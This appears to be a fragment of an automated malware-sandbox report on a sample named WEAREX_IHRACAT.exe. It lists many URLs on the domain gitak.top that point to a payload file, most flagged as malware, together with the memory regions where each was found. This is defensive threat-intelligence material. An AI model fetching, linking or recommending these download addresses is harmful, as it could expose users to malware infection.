      https://gitak.top/dmAaHCQMI79.binA~WEAREX_IHRACAT.exe, 00000002.00000003.2302693054.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3566476517.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038962760.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779599749.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.binK~vWEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305270974.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5778014875.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672784128.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653610966.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binDWEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.binfWEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2617874647.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672578365.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://ocsp.quovadisoffshore.com0WEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723003932.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302487470.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407654898.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.1986769788.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://gitak.top/dmAaHCQMI79.bin9~WEAREX_IHRACAT.exe, 00000002.00000003.2302693054.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3566476517.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038962760.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2828520597.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723257171.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.1986769788.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249592249.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407870559.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2618082877.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bin/M~WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4620491652.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5778014875.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3566476517.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2828520597.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672784128.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249592249.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779599749.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.binceWEAREX_IHRACAT.exe, 00000002.00000002.6653324742.0000000002838000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/7~WEAREX_IHRACAT.exe, 00000002.00000003.5778014875.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672784128.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.binqWEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672578365.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/A~WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.binW~WEAREX_IHRACAT.exe, 00000002.00000003.2302693054.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407870559.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bin/7~WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4515139164.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305270974.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3566476517.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038962760.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725765947.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2828520597.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723257171.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249592249.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779599749.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2618082877.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binzWEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.binlWEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302487470.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407654898.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2617874647.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6093234586.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249244982.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2618082877.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4725430608.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653610966.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/M~WEAREX_IHRACAT.exe, 00000002.00000003.4515139164.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038962760.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723257171.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2618082877.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.binc~WEAREX_IHRACAT.exe, 00000002.00000003.2302693054.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038962760.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2828520597.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407870559.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bin/e~WEAREX_IHRACAT.exe, 00000002.00000003.6620540975.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6515406962.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653610966.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      http://nsis.sf.net/NSIS_ErrorErrorWEAREX_IHRACAT.exe, Caterva.exe.2.drfalse
      • Avira URL Cloud: safe
      		unknown
      https://gitak.top/dmAaHCQMI79.binMicrosoftWEAREX_IHRACAT.exe, 00000002.00000003.4620128373.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723003932.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2302487470.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2197210122.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3038762568.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3354740699.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407654898.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000002.6653532538.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3249244982.00000000028B2000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/K~vWEAREX_IHRACAT.exe, 00000002.00000003.2828520597.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723257171.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2512754360.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2407870559.00000000028F8000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2618082877.00000000028F8000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.bin/dmAaHCQMI79.binlWEAREX_IHRACAT.exe, 00000002.00000003.2723003932.00000000028B2000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/dmAaHCQMI79.binzWEAREX_IHRACAT.exe, 00000002.00000003.4305061153.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3460424593.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6198947773.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3565994921.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5565166961.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2723003932.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2091965259.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4199758222.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3671604418.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5988062623.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5777651201.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3143833257.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4514950009.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2617874647.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.4094289646.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.5672578365.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.3779309512.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2933587214.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.6304603220.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, WEAREX_IHRACAT.exe, 00000002.00000003.2828251598.00000000028B2000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
      https://gitak.top/MyWEAREX_IHRACAT.exe, 00000002.00000003.6410278380.00000000028AA000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: malware
      		unknown
